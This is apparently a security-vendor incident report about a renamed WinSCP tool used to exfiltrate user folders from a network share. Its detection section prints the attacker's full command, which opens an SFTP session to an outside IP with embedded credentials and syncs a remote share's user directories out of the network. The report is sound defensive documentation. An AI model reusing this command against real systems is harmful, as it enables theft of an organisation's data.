Investigative Summary
---------------------
At 2025-09-05 06:40:02 UTC, Huntress observed user "tabadmin" executing a malicious process WinSCP.exe which is being used to exfiltrate data from throughout the network. This process is being run out of the "C:\ProgramData\USOShared\" directory.

Further information about this activity is in the following report:
https://tabinc.huntress.io/admin/infection_reports/1682134

Threat Descriptions:
-------------------
Exfiltration Tools: The adversary is using data exfiltration tools, which facilitate the malicious transfer of data out of the network. This is not evidence of successful exfiltration, and Huntress does not have insight on the affected files. 

Remediations:
-------------
Assisted Remediations provided by the Huntress SOC to remediate the incident. These can be executed automatically in the Huntress Platform:
- Delete File - path: C:\ProgramData\USOShared\\WinSCP.exe
- Delete File - path: C:\ProgramData\USOShared\\d.bat
- Delete File - path: C:\ProgramData\USOShared\\log1.log
- Delete File - path: C:\ProgramData\USOShared\\logu_1.log
- Delete File - path: C:\ProgramData\USOShared\\logu_10.log
- Delete File - path: C:\ProgramData\USOShared\\logu_11.log
- Delete File - path: C:\ProgramData\USOShared\\logu_12.log
- Delete File - path: C:\ProgramData\USOShared\\logu_13.log
- Delete File - path: C:\ProgramData\USOShared\\logu_14.log
- Delete File - path: C:\ProgramData\USOShared\\logu_15.log
- + 15 more

Manual Remediations provided by the Huntress SOC are highly recommended remediation actions to be conducted by your team before resolving the incident in the Huntress Platform:
- Audit network perimeter device logs such as firewalls, remote desktop services, etc. for anomalous/unauthorized access.
- Audit local endpoint logging on affected hosts for anomalous access times or unanticipated activity.

All remediations provided can be found in the Huntress Platform: Incident Report: https://tabinc.huntress.io/org/150377/infection_reports/1682139#remediations-tab

Lead Signal Information
-----------------------
Signal Name: Possible Exfiltration Via Tool In Commonly Abused Directory
Detected At: 2025-09-05 06:39:02 UTC
Start Time: 2025-09-05 06:35:44 UTC
Command: "C:\ProgramData\USOShared\WinSCP.exe"    /log="C:\ProgramData\USOShared\logu_8.log" /ini=nul   /command     "open sftp://turbo:TUasdghGsdh232600HHQPDBF3fh888sdg3GWrBO@77.83.205.215:443/ -hostkey=""ssh-ed25519 255 /w15NwryBQ6gGezOKjxLbEBpIvpS/S9rMyWykyRsnYA"""     "synchronize remote -resumesupport=on ""\\192.168.1.32\c$\users"" ""/home/turbo/data/James/USERS"" -filemask="">4Y; */ | *.as2; *.g2m; *.G2M; *.mdmp; *.MDMP; *.TBI; *.ifc; *.qbw; *.QBW; *.ifc; *.IFC; *.Bak; *.bak; *.BAK; *.mkv; *.MKV; *.pak; *.PAK; *.rdr; *.RDR; *.udsmesh; *.UDSMESH; *.bdl; *.BDL; *.umap; *.UMAP; *.uasset; *.UASSET; *.dmg; *.DMG; *.BA0; *.ba0; *.ica; *.ICA; *.library-ms; *.heic; *.HEIC; *.Msix; *.msix; *.MSIX; *.sqlite; *.SQLITE; *.sql; *.SQL; *.jsonlz4; *.JSONLZ4; *.event; *.EVENT; *.old; *.OLD; *.final; *.FINAL; *.ova; *.OVA; *.DLZ; *.dlz; *.igpi; *.searchconnector-ms; *.IGPI; *.SEARCHCONNECTOR-MS; *.CR3; *.cr3; *.pkg; *.jar; *.avhdx; *.AVHDX; *.vhdx; *.VHDX; *.search-ms; *.SEARCH-MS; *.CRDOWNLOAD; *.crdownload; *.flat; *.FLAT; *.MODULE; *.AAR; *.POM; *.module; *.aar; *.pom; *.dwg; *.DWG; *.adi; *.kt; *.DAT; *.QCOW2; *.IMG; *.JAR; *.KT; *.class; *.CLASS; *.jmob; *.JMOD; *.class; *.CLASS; *.kt; *.DAT; *.QCOW2; *.IMG; *.JAR; *.KT; *.swp; *.SWP; *.rpt; *.RPT; *.do; *.DO; *.ppsx; *.PPSX; *.DBF; *.dbf; *.DLL; *.EXE; *.MDB; *.MDB; *.LNK; *.ZIP; *.RAR; *.ZIP; *.RAR; *.ISO; *.WT; *.MF; *.PKG; *.TFM; *.APK; *.PCAP; *.BBZ; *.RAUCB; *.FW; *.SDB; *.BB3; *.LOC; *.GRD; *.LMP; *.IPRJ; *.SWU; *.DFX; *.22L; *.22O; *.22Q; *.RPK; *.TXLR; *.BLF; *.TXLR.BLF; *.IMP; *.dat; *.qcow2; *.img; *.jar; *.BLK; *.AHC; *.NUP; *.FDT; *.FDX; *.TIS; *.MSIX; *.MSP; *.DA_; *.MD_; *.DL_; *.TM.BLF; *.TM; *.REGTRANS-MS; *.WIM; *.DCT; *.QBB; *.PMA; *.VOL; *.DMP; *.WPL; *.DS_STORE; *.LOCK; *.SVG; *.CAB; *.OLD; *.log1111; *.LOG2; *.WMV; *.QDF-BACKUP; *.M4V; *.M4A; *.GZ; *.OLDGZ; *.RCS; *.WBK; *.SB; *.PPT; *.JS; *.LYNX5; *.BIN; *.AU; *.UPD; *.CSS; *.TMP; *.DOWNLOAD; *.ZIP; *.PART; *.DAT; *.4BK; *.AI; *.MP3; *.PST; *.SQL; *.SUB; *.ASY; *.ASK; *.WIA; *.LAS; *.SLDDRW; *.POR; *.IDB; *.LAS; *.HEIS; *.STP; *.STEP; *.SLDPRT; *.SLDASM; *.GCODE; *.STL; *.BAK; *.ONE; *.ACDB; *.AXD; *.DB; *.MSG; *.FAC; *.MSI; *.LOG; *.MP4; *.HTM; *.DPK; *.LOCAL; *.RSM; *.INI; *.RTF; *.RES; *.ISO; *.DFM; *.DCU; *.PAS; *.VHD; *.FDB; *.FDB; *.BMP; *.DATA; *.PPTX; *.BPL; *.GBB_SAVE; *.IB; *.PSD; *.GBB; *.GBB; *.GBK; *.GBK; *.IB; *.7Z; *.RAR; *.ZIP; *.MOV; *.FIT; *.FIL; *.MP4; *.MOV; *.MDB; *.ISO; *.EXE; *.DLL; *.BAT; *.STL; *.BAK; *.TMP; *.DLL; *.EXE; *.MDB; *.mdb; *.lnk; *.zip; *.rar; *.ZIP; *.RAR; *.ISO; *.wt; *.mf; *.tfm; *.apk; *.pcap; *.bbz; *.raucb; *.fw; *.sdb; *.bb3; *.loc; *.grd; *.lmp; *.iprj; *.swu; *.dfx; *.22l; *.22o; *.22q; *.rpk; *.txlr; *.blf; *.txlr.blf; *.imp; *.blk; *.ahc; *.nup; *.fdt; *.fdx; *.tis; *.msix; *.msp; *.da_; *.md_; *.dl_; *.tm.blf; *.tm; *.regtrans-ms; *.wim; *.dct; *.qbb; *.pma; *.vol; *.dmp; *.wpl; *.DS_Store; *.lock; *.svg; *.cab; *.old; *.log1111; *.log2; *.wmv; *.qdf-backup; *.m4v; *.m4a; *.gz; *.oldgz; *.rcs; *.wbk; *.sb; *.ppt; *.js; *.lynx5; *.bin; *.au; *.upd; *.css; *.tmp; *.download; *.zip; *.part; *.DAT; *.4BK; *.ai; *.mp3; *.pst; *.sql; *.sub; *.asy; *.ask; *.wia; *.las; *.SLDDRW; *.por; *.idb; *.las; *.HEIS; *.stp; *.STEP; *.SLDPRT; *.SLDASM; *.gcode; *.STL; *.bak; *.one; *.acdb; *.axd; *.db; *.msg; *.fac; *.msi; *.log; *.MP4; *.htm; *.dpk; *.local; *.rsm; *.ini; *.rtf; *.res; *.iso; *.dfm; *.dcu; *.pas; *.vhd; *.FDB; *.fdb; *.bmp; *.data; *.pptx; *.bpl; *.GBB_SAVE; *.IB; *.psd; *.gbb; *.GBB; *.GBK; *.gbk; *.ib; *.7z; *.rar; *.zip; *.MOV; *.FIT; *.FIL; *.mp4; *.mov; *.mdb; *.iso; *.exe; *.dll; *.bat; *.stl; *.bak; *.tmp; AppData/; Application/; Start/; Saved/; Cookies/; AppData/; Microstft/; temp/; Favorites/; Links/; Local/; LocalLow/; Roaming/; Music/; NetHood/; PrintHood/; Recent/; SendTo/; js/; Templates/; Videos/; Searches/; Contacts/; windows/; .ms-ad/; tmp/; ClinicTrackerTmp/; .regtrans-ms/; temp/; Libraries/; Print/; My Music/; My Pictures/; My eBooks/; My Received Files/; Application Data/; My Videos/; AppData/; Application/; Start/; Saved/; Cookies/; AppData/; Microstft/; temp/; Favorites/; Links/; Local/; LocalLow/; Roaming/; Music/; NetHood/; PrintHood/; Recent/; SendTo/; js/; Templates/; Videos/; Searches/; Contacts/; windows/; .ms-ad/; tmp/; ClinicTrackerTmp/; .regtrans-ms/; temp/; Libraries/; Print/; My Music/; My Pictures/; My eBooks/; My Received Files/; Application Data/; My Videos/ *.dll; *.bat; *.stl; *.bak; *.tmp; AppData/; Application/; Start/; Saved/; Cookies/; AppData/; Microstft/; temp/; Favorites/; Links/; Local/; LocalLow/; Roaming/; Music/; NetHood/; PrintHood/; Recent/; SendTo/; js/; Templates/; Videos/; Searches/; Contacts/; windows/; .ms-ad/; tmp/; ClinicTrackerTmp/; .regtrans-ms/; temp/; Libraries/; Print/; My Music/; My Pictures/; My eBooks/; My Received Files/; $RECYCLE.BIN/; 3D Objects/; $*/; $/; Default User/; Ubiquiti UniFi/; Ubiquiti*/; .NET v4.5*/; Local Settings*/; .NET v4.5 Classic*/; All Users*/; .NET v4.5/; Local Settings/; .NET v4.5 Classic/; All Users/; My Documents*/; Start Menu*/; Contacts*/; NetHood*/; NTUSER*/; PrintHood*/; Recent*/; Saved Games*/; Searches*/; SendTo*/; Start Menu*/; Templates*/; Videos*/; My Documents*/; Start Menu/; Contacts/; NetHood/; NTUSER.DAT*/; NTUSER.DAT/; PrintHood/; Recent/; Saved Games/; Searches/; SendTo/; Start Menu/; Templates/; Videos/"" -nopermissions -rawtransfersettings ExcludeEmptyDirectories=1"" ^
Executable: C:\ProgramData\USOShared\WinSCP.exe
Process ID: d868744a-8a21-11f0-9739-00155d015106
Parent Process: C:\Windows\system32\cmd.exe
User: tabadmin